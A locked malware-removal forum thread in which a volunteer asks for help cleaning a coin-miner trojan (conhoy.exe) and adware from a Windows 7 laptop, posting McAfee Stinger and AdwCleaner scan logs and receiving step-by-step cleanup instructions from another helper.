Jump to content

Build Theme!
  •  
  • Infected?

WE'RE SURE THAT YOU'LL LOVE US!

Hey there! :wub: Looks like you're enjoying the discussion, but you're not signed up for an account. When you create an account, we remember exactly what you've read, so you always come right back where you left off. You also get notifications, here and via email, whenever new posts are made. You can like posts to share the love. :D Join 93100 other members! Anybody can ask, anybody can answer. Consistently helpful members may be invited to become staff. Here's how it works. Virus cleanup? Start here -> Malware Removal Forum.

Try What the Tech -- It's free!


Photo

Multiple infections including conhoy.exe


  • This topic is locked This topic is locked
36 replies to this topic

#1 Ztruker

Ztruker

    WTT Technical Elder

  • Tech Team
  • 8,292 posts
  • Interests:Helping people fix MS Windows related computer problems of all kinds.

    Waking each morning to see the green side of the Earth!

Posted 27 March 2022 - 11:09 AM

conhoy.exe - Trojan Coin Miner and others.

 

I've run Microsoft Security Scanner from a WinPE USB boot (WIN10XPE actually) several times and it found and supposedly repaired these:

 

Capture.JPG   Capture2.JPG

 

As you can see, it found the same viruses the second run.

Also, conhoy.exe is being put back in the C:\Windows\Temp directory after I delete in Safe mode, then do a normal boot.

 

So, looking for help and ready to go to work.

 

Currently running Windows Repair AIO to see if I can get more of the Windows 7 OS working.

 

HP G56-129WM Laptop

Windows 7 Home Premium

3GB Ram

250GB HDD, 120GB Free

 

I emptied Recycle bin and deleted all System Restore points.

 

Note: It belongs to a friend who needs it to do her income taxes soon :(

 

Running McAfee Stinger from WIN10XPE now.

 

Edit#2: 4+ hours and McAee has found 37 infected files. All except 1 are Artemis!xxxxxxxxxxxx, the other is a ZeroAccess!cfg. Scan still running.

 

Edit#3: This is the McAfee log:

 

McAfee Stinger Scan Results  

McAfee® Labs Stinger™ Version 12.2.0.407 built on Mar 21 2022 at 02:58:49
Copyright© 2013-2022, McAfee, LLC. All Rights Reserved.

AV Engine version v6400.9594 for Windows.
Virus data file v9999.0 created on Mar 21, 2022
Ready to scan for 9634 viruses, trojans and variants.

Custom scan initiated on Sunday, March 27, 2022 15:18:06

C:\$Recycle.Bin\S-1-5-18\$RHZUDWK.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\$Recycle.Bin\S-1-5-18\$RHZUDWK.exe has been Deleted
C:\$Recycle.Bin\S-1-5-21-1250379553-2428740185-3603661230-1000\$RYSC2ZF.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\$Recycle.Bin\S-1-5-21-1250379553-2428740185-3603661230-1000\$RYSC2ZF.exe has been Deleted
C:\Windows\inf\aspnet\lsma22.exe [MD5:d6f8c66d27fa8d4172399afbfbce6975] is infected with Artemis!D6F8C66D27FA
C:\Windows\inf\aspnet\lsma22.exe has been Deleted
C:\Windows\Installer\MSI523E.tmp\Binary.Prereq.dll is infected with Artemis!4B49C57CBEFA
C:\Windows\Installer\MSI523E.tmp\Binary.Prereq.dll couldn't be repaired
C:\Windows\Installer\MSI523E.tmp\Binary.aicustact.dll is infected with Artemis!4BA8EF50CE73
C:\Windows\Installer\MSI523E.tmp\Binary.aicustact.dll couldn't be repaired
C:\Windows\Installer\MSI523E.tmp is infected
C:\Windows\Installer\MSI54E0.tmp\Binary.Prereq.dll is infected with Artemis!4B49C57CBEFA
C:\Windows\Installer\MSI54E0.tmp\Binary.Prereq.dll couldn't be repaired
C:\Windows\Installer\MSI54E0.tmp\Binary.aicustact.dll is infected with Artemis!4BA8EF50CE73
C:\Windows\Installer\MSI54E0.tmp\Binary.aicustact.dll couldn't be repaired
C:\Windows\Installer\MSI54E0.tmp is infected
C:\Windows\Installer\{02815385-b3dc-aa2c-a083-2e509dc82d52}\@ [MD5:ae3ead4fd6c3c421e2bb3b584ca12144] is infected with ZeroAccess!cfg
C:\Windows\Installer\{02815385-b3dc-aa2c-a083-2e509dc82d52}\@ has been Deleted
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2G7A4J886.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2G7A4J886.exe has been Deleted
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2GAN1OK15.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2GAN1OK15.exe has been Deleted
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2HRQN39Y2.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2HRQN39Y2.exe has been Deleted
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2NK87CGAJ.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2NK87CGAJ.exe has been Deleted
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2STKXXTFU.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2STKXXTFU.exe has been Deleted
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[10].exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[10].exe has been Deleted
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[1].exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[1].exe has been Deleted
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[2].exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[2].exe has been Deleted
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[3].exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[3].exe has been Deleted
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[4].exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[4].exe has been Deleted
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[5].exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[5].exe has been Deleted
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[6].exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[6].exe has been Deleted
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[7].exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[7].exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx20WVT86LE.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx20WVT86LE.exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx227K9KN1B.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx227K9KN1B.exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx24FSIT4PJ.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx24FSIT4PJ.exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2724MN2I5.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2724MN2I5.exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx293JQFZS0.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx293JQFZS0.exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx29FG2YMNY.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx29FG2YMNY.exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2GE5I1V2N.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2GE5I1V2N.exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2OWXR8FY6.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2OWXR8FY6.exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2ZACVKQ29.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2ZACVKQ29.exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[2].exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[2].exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[3].exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[3].exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[5].exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[5].exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[6].exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[6].exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[7].exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[7].exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\u[1].exe [MD5:37f4cbf701586ae14abf064811949df6] is infected with Artemis!37F4CBF70158
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\u[1].exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\u[2].exe [MD5:37f4cbf701586ae14abf064811949df6] is infected with Artemis!37F4CBF70158
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\u[2].exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\u[3].exe [MD5:37f4cbf701586ae14abf064811949df6] is infected with Artemis!37F4CBF70158
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\u[3].exe has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\xmr1025VOC27JHY.rar [MD5:d6f8c66d27fa8d4172399afbfbce6975] is infected with Artemis!D6F8C66D27FA
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\xmr1025VOC27JHY.rar has been Deleted
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\xmr1025[1].rar [MD5:d6f8c66d27fa8d4172399afbfbce6975] is infected with Artemis!D6F8C66D27FA
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\xmr1025[1].rar has been Deleted
C:\Windows\Temp\conhoy.exe [MD5:a4fdd182c052c420520377e94442376d] is infected with Artemis!A4FDD182C052
C:\Windows\Temp\conhoy.exe has been Deleted

Summary Report on C:
File(s)
	TotalFiles:............	1223271
	Clean:.................	514119
	Not Scanned:........... 709109
	Possibly Infected:.....	43

Time: 04:11:31

Scan completed on Sunday, March 27, 2022 19:29:37


Rebooted and conhoy.exe is back in C:\Windows\temp so that problem is not resolved.

 

Edit#4: Just started ESET Online Scanner. Will let it run over night as it will take 4+ hours to complete. See if it does a better job of cleaning up than the other have done.


Edited by Ztruker, 27 March 2022 - 07:48 PM.

Rich
 

Die with memories, not dreams. – Unknown

    Advertisements

Register to Remove


#2 Juliet

Juliet

    SuperHelper

  • Retired Classroom Teacher
  • 7,686 posts
  • Interests:Boo!....
  • MVP

Posted 28 March 2022 - 07:20 AM

As it is right now. don't use this computer for taxes. Trying to research the infections found so far are looking pretty bad.

Malwarebytes AdwCleaner

-------------------

  • Please download AdwCleaner and save it to your Desktop
  • Close all open programs and browsers
  • Right click on the icon and select Run as administrator
  • Click Scan now
  • Allow the program to Quarantine what it finds except for Pre-installed applications if you would like to keep those or other entries you would like to keep
  • When completed click View Scan Log File
  • Copy and paste the contents in your reply
  • Click Skip Basic Repair if it appears then close the program

===================================================

Run Malwarebytes Anti-Malware

You may have Malwarebytes Anti-Malware installed but if not, you can download it from here:

  • run the program
  • click on the ‘Dashboard’ to make sure everything is up to date, (it is not necessary to upgrade to the premium version of MBAM)
  • click on the ‘Scan’ tab, (directly below the Dashboard tab)
  • select the Threat Scan option
  • slick the Scan Now button
  • Threat Scan will begin
  • when the scan has completed and if malware was found, click the Quarantine Selected button to allow MBAM to quarantine what was found
  • if prompted to restart the computer, close all other programs and click Yes to restart your computer
  • once you are back at your desktop, open MBAM once more
  • click on the ‘Reports’ tab
  • double-click on the most recent Scan Report
  • click on Export, then Copy to Clipboard

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`

xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Scan

  • Please download Farbar Recovery Scan Tool (x32) or Farbar Recovery Scan Tool (x64) and save the file to your Desktop.
  • Note: Download and run the version compatible with your system (32 or 64-bit). Download both if you're unsure; only one will run.
  • Right-Click FRST.exe / FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Click Yes to the disclaimer.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply.
  • (Scan times will vary from one system to another. Sometimes the scan may appear to hang and you may even see a message that says, Program not responding. Most likely that will be temporary and the scan will resume on its own. It is not unusual for a complete scan to take up to10 minutes or even longer depending on what the scan is finding.)

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Please post these logs when finished.

Sometimes the angels fly close enough to you that you can hear the flutter of their wings...


MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??

#3 Ztruker

Ztruker

    WTT Technical Elder

  • Tech Team
  • 8,292 posts
  • Interests:Helping people fix MS Windows related computer problems of all kinds.

    Waking each morning to see the green side of the Earth!

Posted 28 March 2022 - 09:10 AM

I ran AdwCleaner, here is the log:

 

# -------------------------------
# Malwarebytes AdwCleaner 8.3.1.0
# -------------------------------
# Build:    11-18-2021
# Database: 2022-03-15.3 (Cloud)
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start:    03-28-2022
# Duration: 00:00:45
# OS:       Windows 7 Home Premium
# Scanned:  32050
# Detected: 411
 
 
***** [ Services ] *****
 
No malicious services found.
 
***** [ Folders ] *****
 
PUP.Adware.Heuristic            C:\ProgramData\AVG_UPDATE_0814TB
PUP.Optional.AppGraffiti        C:\Program Files (x86)\AppGraffiti
PUP.Optional.Ask                C:\ProgramData\Ask
PUP.Optional.Ask                C:\Users\lindag\AppData\LocalLow\AskToolbar
PUP.Optional.BrowseFox          C:\Program Files (x86)\Mega Browse
PUP.Optional.Conduit            C:\Program Files (x86)\Conduit
PUP.Optional.Conduit            C:\Program Files (x86)\SEARCHPROTECT
PUP.Optional.Conduit            C:\Users\Marilyn\AppData\LocalLow\Conduit
PUP.Optional.Conduit            C:\Users\Marilyn\AppData\Local\Conduit
PUP.Optional.Conduit            C:\Users\Marilyn\AppData\Local\SEARCHPROTECT
PUP.Optional.Legacy             C:\Program Files (x86)\AVG Security Toolbar
PUP.Optional.Legacy             C:\Program Files (x86)\Yahoo!\Companion
PUP.Optional.Legacy             C:\Users\Guest\AppData\LocalLow\AVG Secure Search
PUP.Optional.Legacy             C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39
PUP.Optional.Legacy             C:\Users\Jay\AppData\LocalLow\AVG Secure Search
PUP.Optional.Legacy             C:\Users\Marilyn\AppData\LocalLow\AVG Security Toolbar
PUP.Optional.Legacy             C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39
PUP.Optional.Legacy             C:\Users\Marilyn\AppData\LocalLow\Yahoo!\Companion
PUP.Optional.Legacy             C:\Users\Marilyn\AppData\LocalLow\YahooCouponAddOn
PUP.Optional.Legacy             C:\Users\Marilyn\AppData\Local\Programs\BeFrugal.com
PUP.Optional.Legacy             C:\Users\Marilyn\AppData\Local\VisualBeeClient
PUP.Optional.Legacy             C:\Users\Marilyn\AppData\Local\emaze
PUP.Optional.Legacy             C:\Users\Public\Documents\Downloaded Installers
PUP.Optional.Legacy             C:\Users\lindag\AppData\LocalLow\AVG Secure Search
PUP.Optional.Legacy             C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39
PUP.Optional.Legacy             C:\Users\lindag\AppData\Local\Temp\APNLogs
PUP.Optional.Legacy             C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\AVG Secure Search
PUP.Optional.MySearchDial       C:\Users\Marilyn\AppData\LocalLow\Mysearchdial
PUP.Optional.MySearchDial       C:\Users\Marilyn\AppData\Roaming\Mysearchdial
PUP.Optional.MyWebSearch        C:\Program Files (x86)\MAPSGALAXY_39EI
PUP.Optional.MyWebSearch        C:\Program Files (x86)\TOTALRECIPESEARCH_14EI
PUP.Optional.MyWebSearch        C:\Program Files (x86)\WEATHERBLINKEI
PUP.Optional.PCFixCleaner       C:\Program Files (x86)\FixCleaner
PUP.Optional.PCFixCleaner       C:\Users\Marilyn\AppData\Roaming\FixCleaner
PUP.Optional.PCKeeper           C:\ProgramData\Essentware
PUP.Optional.PCKeeper           C:\Users\Marilyn\AppData\Local\Essentware
PUP.Optional.PriceGong          C:\Users\Marilyn\AppData\LocalLow\PriceGong
PUP.Optional.SlimCleanerPlus    C:\Users\Marilyn\AppData\Local\slimware utilities inc
PUP.Optional.Spigot.Generic     C:\Program Files (x86)\Coupons
PUP.Optional.VisiCoupons        C:\Users\Marilyn\AppData\Local\visi_coupon
PUP.Optional.VisualBee          C:\ProgramData\VisualBee
PUP.Optional.VisualBee          C:\Users\Marilyn\AppData\Local\VisualBeeExe
 
***** [ Files ] *****
 
PUP.Optional.Ask                C:\Users\Guest\AppData\LocalLow\Microsoft\Internet Explorer\Services\Search_ask.com.xml
PUP.Optional.Ask                C:\Users\Jay\AppData\LocalLow\Microsoft\Internet Explorer\Services\Search_ask.com.xml
PUP.Optional.Ask                C:\Users\Marilyn\AppData\LocalLow\Microsoft\Internet Explorer\Services\Search_ask.com.xml
PUP.Optional.Ask                C:\Users\lindag\AppData\LocalLow\Microsoft\Internet Explorer\Services\Search_ask.com.xml
PUP.Optional.Legacy             C:\Windows\System32\drivers\swdumon.sys
 
***** [ DLL ] *****
 
No malicious DLLs found.
 
***** [ WMI ] *****
 
No malicious WMI found.
 
***** [ Shortcuts ] *****
 
No malicious shortcuts found.
 
***** [ Tasks ] *****
 
PUP.Adware.Heuristic            C:\Windows\System32\Tasks\AVG-SECURE-SEARCH-UPDATE_JUNE2013_TB_RMV
PUP.Adware.Heuristic            C:\Windows\System32\Tasks\SlimCleaner Plus (Scheduled Scan - Marilyn)
PUP.Adware.Heuristic            C:\Windows\Tasks\AVG-SECURE-SEARCH-UPDATE_JUNE2013_TB_RMV.JOB
PUP.Adware.Heuristic            C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Marilyn).job
PUP.Optional.BitCoinMiner       C:\Windows\System32\Tasks\OK
PUP.Optional.MySearchDial       C:\Windows\Tasks\MYSEARCHDIAL.JOB
 
***** [ Registry ] *****
 
PUP.Adware.Heuristic            HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8FB062A9-BD13-42B5-B65F-B285C09B088E}
PUP.Adware.Heuristic            HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8FB062A9-BD13-42B5-B65F-B285C09B088E}
PUP.Adware.Heuristic            HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C9E3D7FF-0540-40E1-BD19-0D3BE6985F4E}
PUP.Adware.Heuristic            HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVG-SECURE-SEARCH-UPDATE_JUNE2013_TB_RMV
PUP.Adware.Heuristic            HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SlimCleaner Plus (Scheduled Scan - Marilyn)
PUP.Optional.AVGSecureSearch    HKLM\Software\Classes\Search.PugiObj.1
PUP.Optional.AppEnable.A        HKLM\Software\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
PUP.Optional.AppEnable.A        HKLM\Software\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
PUP.Optional.AppEnable.A        HKLM\Software\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66}
PUP.Optional.AppEnable.A        HKLM\Software\Wow6432Node\\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52}
PUP.Optional.AppEnable.A        HKLM\Software\Wow6432Node\\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
PUP.Optional.AppEnable.A        HKLM\Software\Wow6432Node\\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
PUP.Optional.AppEnable.A        HKLM\Software\Wow6432Node\\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66}
PUP.Optional.AppGraffiti        HKCU\Software\AppGraffiti
PUP.Optional.BitCoinMiner       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9EC65580-F30B-49AD-B23D-E6619DA3685B}
PUP.Optional.BitCoinMiner       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9EC65580-F30B-49AD-B23D-E6619DA3685B}
PUP.Optional.BitCoinMiner       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ok
PUP.Optional.BrowseFox.A        HKLM\Software\Wow6432Node\\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
PUP.Optional.Conduit            HKCU\Software\AppDataLow\Software\Conduit
PUP.Optional.Conduit            HKCU\Software\AppDataLow\Software\ConduitSearchScopes
PUP.Optional.Conduit            HKLM\Software\Wow6432Node\Conduit
PUP.Optional.CrossRider         HKCU\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{67C6E516-312C-4A80-8BBC-CFDD6D8989D}
PUP.Optional.CrossRider         HKCU\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A35B62B8-1114-4F40-B138-6C2189D5A5C8}
PUP.Optional.CrossRider         HKCU\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A6867201-8ABE-4A52-A9C9-CDE34DFDAFA4}
PUP.Optional.CrossRider         HKCU\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{ABFC64F0-D9E3-43A6-9927-45B868125E5D}
PUP.Optional.CrossRider         HKCU\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a37804e0-4c35-486f-9197-5b486daf6aa6}
PUP.Optional.CrossRider         HKCU\Software\AppDataLow\Software\Crossrider
PUP.Optional.CrossRider         HKCU\Software\AppDataLow\Software\Information
PUP.Optional.CrossRider         HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Information
PUP.Optional.CrossRider         HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a37804e0-4c35-486f-9197-5b486daf6aa6}
PUP.Optional.CrossRider         HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a37804e0-4c35-486f-9197-5b486daf6aa6}
PUP.Optional.InstallCore        HKCU\Software\InstallCore
PUP.Optional.InstallCore        HKCU\Software\csastats
PUP.Optional.Legacy             HKCU\Software\AppDataLow\Software\Smartbar
PUP.Optional.Legacy             HKCU\Software\AppDataLow\Software\Yahoo\Companion
PUP.Optional.Legacy             HKCU\Software\BEFRUGAL
PUP.Optional.Legacy             HKCU\Software\ICSW1.23
PUP.Optional.Legacy             HKCU\Software\InstalledBrowserExtensions
PUP.Optional.Legacy             HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{4937BE7D-D79B-4503-916B-57CD4454756C}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{786CACE0-4B52-4B5E-9B22-4A8063236C63}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{C04B7D22-5AEC-4561-8F49-27F6269208F6}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser|{D4027C7F-154A-4066-A1AD-4243D8127440}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser|{D7E97865-918F-41E4-9CD0-25AB1C574CE8}
PUP.Optional.Legacy             HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser|{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
